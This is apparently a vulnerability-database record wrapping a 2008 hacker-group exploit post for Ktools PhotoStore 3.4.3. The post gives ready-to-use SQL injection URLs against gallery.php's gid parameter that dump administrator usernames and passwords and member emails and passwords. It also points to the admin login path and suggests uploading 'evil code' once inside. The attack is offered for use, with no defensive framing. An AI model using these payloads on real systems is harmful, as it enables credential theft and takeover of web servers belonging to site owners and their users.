Ktools PhotoStore 3.4.3 (gallery.php gid) SQL Injection Vulnerability

2008-05-11T00:00:00

Description

No description provided by source.

{"sourceData": "\n #########################################\r\n# Remote SQL Injection Vulnerability    #\r\n#                                       #\r\n#  PhotoStore 3.4.3 ( gallery.php gid ) #\r\n#                                       #\r\n#########################################\r\n## Script NAME  : PhotoStore\r\n## VERSION : 3.4.3\r\n## DOWNLOAD : http://www.ktools.net/\r\n#########################################\r\n## AuTh0r : Mr.SQL\r\n## H0ME   : WwW.PaL-HaCkEr.CoM\r\n## Email   : SQL@Hotmail.it \r\n#########################################\r\n## D0rk ::  n/a   ;)\r\n################################################################################\r\n\r\n## ExPlo!t For ADMIN INFO  :\r\n===> http://www.exampel.com/gallery.php?gid=-9696'+UnIoN+SelecT+1,concat(username,0x3c7c7c204d722e53514c207c7c3e,password),3,4,5,6,7,8,9,10,1,12,13+from+mgr_users/*\r\n \r\n#############\r\n \r\n## Explo!T For Users INFO :\r\n===> http://www.exampel.com/gallery.php?gid=-9696'+union+select+1,concat(email,'::Mr.SQL::',password),3,4,5,6,7,8,9,10,1,12,13+from+members/*\r\n\r\n###################################################################################\r\n \r\n===>> Admin P@nel\r\n                    /manager/login.php\r\n\r\n### N0TE ## YOU Can UploaD Your Ev!l Code  ADMIN CP\r\n#############\r\n<< Gr33Tz >>  \r\nDark MaSTer :: HaCkEr-EGy :: MoHaMeD el 3rab :: ALwHeD :: HeBarieH :: SecuritY FearS :: (( MuslimS HaCkErS ))\r\n#####################################################\r\n                                                      \r\n                                                                (( Geek InjEcT0r ))\n ", "status": "poc", "description": "No description provided by source.", "sourceHref": "https://www.seebug.org/vuldb/ssvid-8424", "reporter": "Root", "href": "https://www.seebug.org/vuldb/ssvid-8424", "type": "seebug", "viewCount": 3, "references": [], "lastseen": "2017-11-19T21:42:05", "published": "2008-05-11T00:00:00", "cvelist": [], "id": "SSV:8424", "enchantments_done": [], "modified": "2008-05-11T00:00:00", "title": "Ktools PhotoStore 3.4.3 (gallery.php gid) SQL Injection Vulnerability", "cvss": {"score": 0.0, "vector": "NONE"}, "bulletinFamily": "exploit", "enchantments": {"score": {"value": 0.6, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.6}, "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645264438}}